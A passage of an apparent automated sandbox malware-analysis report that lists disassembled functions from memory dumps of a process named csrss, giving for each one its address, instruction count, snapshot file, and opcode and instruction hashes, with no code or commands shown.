                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: /
                          • API String ID: 0-2043925204
                          • Opcode ID: fcf1bebcbc263503d96fc9b46e111c1e8f4508af4e085f0bafad8482fe6c45f2
                          • Instruction ID: 3c274bda7ea094f7419406e75c26868fc7c34f3cfeaac89609d9ee6278c682be
                          • Opcode Fuzzy Hash: fcf1bebcbc263503d96fc9b46e111c1e8f4508af4e085f0bafad8482fe6c45f2
                          • Instruction Fuzzy Hash: 5921E435E0961E8FDB68CF94D8A0AEDB7B1EF45311F1001AAD10AA76A0CA746A94CF00
                          Function 00007FFD9B791168 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: /
                          • API String ID: 0-2043925204
                          • Opcode ID: 99bf3a3232eb48a22400f496ec49dcf1e83318a2bb7b67f68216120a26f8e66d
                          • Instruction ID: 7a1012a293a120e65a7669ec12109e24e7f32f33dd2a603eb5b2dea3612a4285
                          • Opcode Fuzzy Hash: 99bf3a3232eb48a22400f496ec49dcf1e83318a2bb7b67f68216120a26f8e66d
                          • Instruction Fuzzy Hash: 89F0EC35A0861D8FDF28DF90C8A0AEE77B1EB55311F04026AD51ADB2A0DA746A54CB41
                          Function 00007FFD9B79316D Relevance: .5, Instructions: 453COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 794ef3b4137351c42f96313c5f050ac1ac5404c284bc9013ae784924ca6253c1
                          • Instruction ID: 251c68103166370bfc8ba77191e3612bdcd675c726e855756440108bcb3c5fab
                          • Opcode Fuzzy Hash: 794ef3b4137351c42f96313c5f050ac1ac5404c284bc9013ae784924ca6253c1
                          • Instruction Fuzzy Hash: B7115121A0E78A4EE753AB6888695B97BF0EF16300F0B05F7D458C71B3DA28AA448751
                          Function 00007FFD9B78D829 Relevance: .4, Instructions: 395COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8e44c8c073ff8e36bd2b2913cae12a185bcac4e6a170e3f0e912de72ec17794
                          • Instruction ID: f64c3e86af288208c6ca3ef63301d8117f5f85abb6de1f5fcf796aa43d241f4e
                          • Opcode Fuzzy Hash: d8e44c8c073ff8e36bd2b2913cae12a185bcac4e6a170e3f0e912de72ec17794
                          • Instruction Fuzzy Hash: CAE13B71E19A5D8FEBA8EF98C4A57ACB7A1FF58301F4441BED01DD32A6CA346940CB41
                          Function 00007FFD9B7939A5 Relevance: .2, Instructions: 243COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0748c250e39b3210babf7f2de5af2b30144b2b7cf644f2bc46bebc1fe0c147a3
                          • Instruction ID: d0e2a164dc6577eb39cad971b5cbb4e4316ce29d50b59be4673d0192afef7f30
                          • Opcode Fuzzy Hash: 0748c250e39b3210babf7f2de5af2b30144b2b7cf644f2bc46bebc1fe0c147a3
                          • Instruction Fuzzy Hash: 0891CE70E0961D8FDBA4DBA8C8557EDB6B1FF59301F5242BAD00DE32A1DF345A848B50
                          Function 00007FFD9B78C009 Relevance: .2, Instructions: 203COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ad4421935697bff46b9557cedb822100d157cf8d23f4dbe4bc14ade92362563
                          • Instruction ID: 482581832ebb5e75ae755917dcca5b8dcb88ccbbbd71ad9fae46f28fb95f61de
                          • Opcode Fuzzy Hash: 5ad4421935697bff46b9557cedb822100d157cf8d23f4dbe4bc14ade92362563
                          • Instruction Fuzzy Hash: ED61FD70E09A1D8FDBA4EBA8D8A56ED77F1FF59301F51027AD00DE72A2DE3469418B40
                          Function 00007FFD9B795EC5 Relevance: .2, Instructions: 192COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea1eb83c99c481c11e5b8a80d0a024b0872bae583dc4cd8e0261da5ea4ca173d
                          • Instruction ID: e76c105c1418e0a90c91db8f39ce3021cabb477dfca80f3b9ddfbb303b164635
                          • Opcode Fuzzy Hash: ea1eb83c99c481c11e5b8a80d0a024b0872bae583dc4cd8e0261da5ea4ca173d
                          • Instruction Fuzzy Hash: 8871EA70E0971D8EEBA4DBA4C4657ADB7B1FF55340F5142BAD00DE62A1DF385A84CB01
                          Function 00007FFD9B7831B1 Relevance: .2, Instructions: 177COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa3c39a571645112cdc13a903b9382fdfe34f61dda0520d3b0fee543382c44ec
                          • Instruction ID: c71e13d9ea3a030329ca7dfddd2a2b383dc818b261c5d32447ed8fc4027bcbf0
                          • Opcode Fuzzy Hash: aa3c39a571645112cdc13a903b9382fdfe34f61dda0520d3b0fee543382c44ec
                          • Instruction Fuzzy Hash: 3D612E70E09A1D8FDB54DF98C4A46EDB7F1FF55302F52427AE009E72A2DA386A44CB50
                          Function 00007FFD9B78ACE8 Relevance: .2, Instructions: 166COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b6cbd7d9769ee38366d0fadb5de6acb939d84ff37f4efb11cb85b20c6482ddb
                          • Instruction ID: 75d98b8bc0944f850cdfca277fb2a141ba964961494d835278b918f64f7f2c29
                          • Opcode Fuzzy Hash: 3b6cbd7d9769ee38366d0fadb5de6acb939d84ff37f4efb11cb85b20c6482ddb
                          • Instruction Fuzzy Hash: 41512B61E0EE4F4FE7229BB888A95E87BE1FF56312F0546B6C059C70F6ED34A5058350
                          Function 00007FFD9B797495 Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f3aff1c29f80ac318a67c8f9cdb3eaaa83ff85417b56fec53ccc8617e106f37
                          • Instruction ID: e96ed7839790a4e012da81bda956504d822ed6b869d5adcfc5e1d1aae6ea5a8a
                          • Opcode Fuzzy Hash: 6f3aff1c29f80ac318a67c8f9cdb3eaaa83ff85417b56fec53ccc8617e106f37
                          • Instruction Fuzzy Hash: 6131CD31E0E34E9EEB61ABA4C864AF93BF0EF45310F0502B6D409D71B2EB38A9448711
                          Function 00007FFD9B796C49 Relevance: .1, Instructions: 91COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3858d29124092f3f3c037e7ef4ce74397564d037239861f8544fbeb60d176413
                          • Instruction ID: 130e5b49922990ce50a7b0b8d2683f17080116a306e182f6501bd82ef3684d54
                          • Opcode Fuzzy Hash: 3858d29124092f3f3c037e7ef4ce74397564d037239861f8544fbeb60d176413
                          • Instruction Fuzzy Hash: E131B030A0E74E8FEB69EB6888652B97BA0FF15345F0106BAE429C21F2DE35B544C741
                          Function 00007FFD9B796D7D Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98b3aa00870fa8b82e33b154946b4bf6064ac610cc2bea576090afcf09e5a0b6
                          • Instruction ID: 63b60f40472ab8d87fad55770bf76addcf16559bf469046aa385bc5659ae526e
                          • Opcode Fuzzy Hash: 98b3aa00870fa8b82e33b154946b4bf6064ac610cc2bea576090afcf09e5a0b6
                          • Instruction Fuzzy Hash: A5210531A0AB4E8BEF69AE6488752B936E0FF14740F0103BED42DC21F2DE35A514A741
                          Function 00007FFD9B78C7FB Relevance: .1, Instructions: 88COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3fd4f96a0a598d3fd407f760b7ebe25a590e598ab64b8e4b332ee0dde20ef83
                          • Instruction ID: f0d9b6d9fd95d14b10c17f38fb93460f4fddc2bf487691cb0d51fc5f4ef46ed2
                          • Opcode Fuzzy Hash: d3fd4f96a0a598d3fd407f760b7ebe25a590e598ab64b8e4b332ee0dde20ef83
                          • Instruction Fuzzy Hash: EE21B126F8EA1B5EEB557BF8B0654FC3790EF21322F0506B6E41D950F2CE3825408A95
                          Function 00007FFD9B7972A1 Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c935ba911ece7958341dfc60ce7066d26785ad33a262386e8795949c8d32958a
                          • Instruction ID: 3675b24cb9303f7596f892cc523299dccb655f9a83da543a87473e22c0daef92
                          • Opcode Fuzzy Hash: c935ba911ece7958341dfc60ce7066d26785ad33a262386e8795949c8d32958a
                          • Instruction Fuzzy Hash: 61215331E1E64EAEEB61EBA4D8686BD77F4FF19301F010676E418C30B5DB38A6508710
                          Function 00007FFD9B783505 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fa5da0f6375a466af7d83763ffd84720dc81b4ec2f68b34f9634f3a2a8f65de6
                          • Instruction ID: 8ec3baee508383938370bd4a196924fc17097d079d33635fef1821c17fb77089
                          • Opcode Fuzzy Hash: fa5da0f6375a466af7d83763ffd84720dc81b4ec2f68b34f9634f3a2a8f65de6
                          • Instruction Fuzzy Hash: E1216170E0AA4E8FEB69EF6884A95BD77A0FF14302F1205BAE41DC61B1DB35A6508750
                          Function 00007FFD9B793B23 Relevance: .1, Instructions: 82COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ce8dd8ce8bc0513c3c88cf818ff42f77d86271930e1bdeea949f1468b2c5d69
                          • Instruction ID: 93f4ba9e69633ee47da15f00b1fa2af3321e2665e6339d891901e81f5a378c8e
                          • Opcode Fuzzy Hash: 1ce8dd8ce8bc0513c3c88cf818ff42f77d86271930e1bdeea949f1468b2c5d69
                          • Instruction Fuzzy Hash: F031A770E1962D8FDBA4DB98C864BECB7F1FB58301F5142AAD00DE32A1DB745A848F50
                          Function 00007FFD9B797A7D Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a768710ba53dea3dc3d0c91a44cb603ff33d5ee52b97039277f14fe70f1d9249
                          • Instruction ID: 12d01324e252ca320f8d04897dfd69897ede35109b0e9cacf15cb4ee6cadba9b
                          • Opcode Fuzzy Hash: a768710ba53dea3dc3d0c91a44cb603ff33d5ee52b97039277f14fe70f1d9249
                          • Instruction Fuzzy Hash: 9721F430A4E78E5FEB69AF7888756B93BA0EF15304F0605BAD419C60F2DB34A754C341
                          Function 00007FFD9B7833D8 Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bf7b91dc77f0f0653fcfcf6057f3df3ad75b15725e371ab61aba5c75a4b93f0
                          • Instruction ID: a7880405d75cb97a9dae9bb7d503abd48b16ff70f15b79a1879739241726ef79
                          • Opcode Fuzzy Hash: 4bf7b91dc77f0f0653fcfcf6057f3df3ad75b15725e371ab61aba5c75a4b93f0
                          • Instruction Fuzzy Hash: 9021903094E78A8FD743EB74C8586A53BF0EF17315B0644FAD408CB072DA38A546C721
                          Function 00007FFD9B796B21 Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 045567d9e83640729de174c6c489402e8ed0a9d77ab1f2d57649ade6d87ceb55
                          • Instruction ID: 34124b8a9695cf373842d2e445058aa593f68f35b33d2e6f437656d7c9946035
                          • Opcode Fuzzy Hash: 045567d9e83640729de174c6c489402e8ed0a9d77ab1f2d57649ade6d87ceb55
                          • Instruction Fuzzy Hash: 4911B130A09A4E8FDB58EFA884696BD7BF0FF68345F1106BED41DC31A6DA34A550C741
                          Function 00007FFD9B792518 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 36625df6254a9aa02e865ac152c3e1f388479ffabeb8158633af2e8271565176
                          • Instruction ID: fbd02ab3953fa839a27c23c073f78b201ab6cb83f2c88b2e03739a9754116351
                          • Opcode Fuzzy Hash: 36625df6254a9aa02e865ac152c3e1f388479ffabeb8158633af2e8271565176
                          • Instruction Fuzzy Hash: B5215B2094E78A4FD75AABB088385A47FB0AF16304B1645EBD44AC70F3DA295945C711
                          Function 00007FFD9B794585 Relevance: .1, Instructions: 66COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b9a70b16c9235adde587b4f401fc150112eb9ead3a3949d0cdad9310ae0ffb9
                          • Instruction ID: ecf9f39fc24e9bb32fb2fe19be307eaaf5ae32dbdc20d2a9ecb668f10bcef22f
                          • Opcode Fuzzy Hash: 5b9a70b16c9235adde587b4f401fc150112eb9ead3a3949d0cdad9310ae0ffb9
                          • Instruction Fuzzy Hash: 9911A270A09A4E8FDB68EFA484696B97BA0FF58305F0102BED41DC61A6DA346540C741
                          Function 00007FFD9B7938FA Relevance: .1, Instructions: 66COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1dbbe24a0828e29891c627308165962d5ef2ff15e75e5ca4ed6390d4f3748b2e
                          • Instruction ID: 5acb766cf4a7ec45652f651b9121a52f53e2a0e330c29a2960f6bf72b639ed5c
                          • Opcode Fuzzy Hash: 1dbbe24a0828e29891c627308165962d5ef2ff15e75e5ca4ed6390d4f3748b2e
                          • Instruction Fuzzy Hash: 4A21F631A0E78E4EE752EBA898686F97BE0FF15314F0605B6D408C70B3DA24A644C721
                          Function 00007FFD9B780A01 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 758d489891bae2a18dd54981c2eef7215cd070936590413ab31f8ef9edd31fbc
                          • Instruction ID: 4e52c99d8fb41fcdccfb51a2e2861bdd45a6a3eb951d1015c1195f5fa0d5bc23
                          • Opcode Fuzzy Hash: 758d489891bae2a18dd54981c2eef7215cd070936590413ab31f8ef9edd31fbc
                          • Instruction Fuzzy Hash: 6F119135A1AA0E4FE790EBA8C8995BD77E0FF54701F4546BAC41CC71B6DE38A5418701
                          Function 00007FFD9B794A25 Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 11b84f6c19fd4d35806c7e78870cde27a45619b1eb087f2e4d821631b6f1dad3
                          • Instruction ID: 58ad902ade10bfdba682d58e46b093cdf560f5c88162f9e458ea781d0d18714a
                          • Opcode Fuzzy Hash: 11b84f6c19fd4d35806c7e78870cde27a45619b1eb087f2e4d821631b6f1dad3
                          • Instruction Fuzzy Hash: C2112371E0EB8E4BEB68DFA488B52B837A0FF25304F0101BED41DC25F2DA296514C601
                          Function 00007FFD9B7944E9 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0ecc3956d8a7dc65961ba9d46e7cb8dab49ad46a657f7a88cf2f938b087313f
                          • Instruction ID: f54e099bf0fe27090e6f4339ad194f851a649a40dc20f2196ec4b7e5b458a05f
                          • Opcode Fuzzy Hash: a0ecc3956d8a7dc65961ba9d46e7cb8dab49ad46a657f7a88cf2f938b087313f
                          • Instruction Fuzzy Hash: DC21A170A0974E8FDB69EFA884691B97BA0FF58301F0101BFD419C71B2DA346540C741
                          Function 00007FFD9B796CE5 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9867a40530ef8e6e8277e8dad57d5cead0653cc0d2f90a129637ef7d02dbe675
                          • Instruction ID: 5fead6c50f8f380319cf007cfd92ceea27b9b5c908a7f3d2fe28f087f3c16417
                          • Opcode Fuzzy Hash: 9867a40530ef8e6e8277e8dad57d5cead0653cc0d2f90a129637ef7d02dbe675
                          • Instruction Fuzzy Hash: 95113871A0EB8D4BEB69DE6488751B87BE0FF25300F0106BED42DC21F2DE25A504D301
                          Function 00007FFD9B78C7D3 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1416a68ca18a66595d08ab78a2ebc2ea30eec4ec9fe9ee466c100d5f8989c604
                          • Instruction ID: a618c53c123b0473099eef93d9ffcfd5da341f8f0b49bed3254b6aa2c0269080
                          • Opcode Fuzzy Hash: 1416a68ca18a66595d08ab78a2ebc2ea30eec4ec9fe9ee466c100d5f8989c604
                          • Instruction Fuzzy Hash: BA11E339B5EB9A8FD745AB68E8652F97BA0EF46212F0505BFC408C70A2C6342514C351
                          Function 00007FFD9B794D99 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 973772ff93a263f072ce334334e743bad823953f7c93ac31b90068476117f2c4
                          • Instruction ID: 901f94a2dbf60cfccbdc207201792f7df37301103ce247137820144b35256a1a
                          • Opcode Fuzzy Hash: 973772ff93a263f072ce334334e743bad823953f7c93ac31b90068476117f2c4
                          • Instruction Fuzzy Hash: 9B11BE35A0AB8E4FEB69EB6488692B97BF0FF19300F0505BED419C31B2DA3466408701
                          Function 00007FFD9B792701 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ce57c996811cb15ff42a0e6a020cb4f526d1e39778333a256e670168c04298c
                          • Instruction ID: ee25f493942a6988d7f1dc7e0797b8e10cc78ef53d24d189de46fd0c8e11d637
                          • Opcode Fuzzy Hash: 2ce57c996811cb15ff42a0e6a020cb4f526d1e39778333a256e670168c04298c
                          • Instruction Fuzzy Hash: 0411C43090964E8EEB52BBB488585FA7BF4EF19301F0509B2E418C70B6EA34A284C701
                          Function 00007FFD9B792E75 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3966b95357bed793c6b3c0d948e7d9fa929a5ca16964a48835af0f7f2f3cf741
                          • Instruction ID: 3d67fa900e1dab979d98569181f5fbcca3f79325b7766d6d800656c29d07f109
                          • Opcode Fuzzy Hash: 3966b95357bed793c6b3c0d948e7d9fa929a5ca16964a48835af0f7f2f3cf741
                          • Instruction Fuzzy Hash: 2F117031E09A4E9FEB55FBA488A95B977E0FF19301F0105B6D418C30B6EA34A5848740
                          Function 00007FFD9B7811AD Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce7ec1163d0163dafae0fd8f27f551037799aecc39407f7fc3df09c7b712c0bb
                          • Instruction ID: a4c0cb502523dd3c75cb7f7af665bcf4d36dcb3c36aa14e70f4a05b8c6356b62
                          • Opcode Fuzzy Hash: ce7ec1163d0163dafae0fd8f27f551037799aecc39407f7fc3df09c7b712c0bb
                          • Instruction Fuzzy Hash: 8411B671E0AA4E4FEB65DBA484B96B97BE0EF59302F1105BEC01AC74F1DE356644C700
                          Function 00007FFD9B78C850 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21f8993f91a36225a728bcc46404dde51152bf31cf0283cfab237831b076b47c
                          • Instruction ID: 9a57ee2f185e8f6c5fa2f4f984bc10e466f15a8c4f6de4e33708826c9c80c838
                          • Opcode Fuzzy Hash: 21f8993f91a36225a728bcc46404dde51152bf31cf0283cfab237831b076b47c
                          • Instruction Fuzzy Hash: A611BC30A4A64E9FEB46EB74D4681B93BB0EF15301B0506BBD41DD70B2CA386940C740
                          Function 00007FFD9B794B4D Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 214f0b33cdc0d0c7a3c1d9bc4ce5e7e7818f28b1749c56ec312eea4a86d94575
                          • Instruction ID: 8b8d1551cf81e83d0742c0548c05cb19211f7490472eb73c98eab77da809445c
                          • Opcode Fuzzy Hash: 214f0b33cdc0d0c7a3c1d9bc4ce5e7e7818f28b1749c56ec312eea4a86d94575
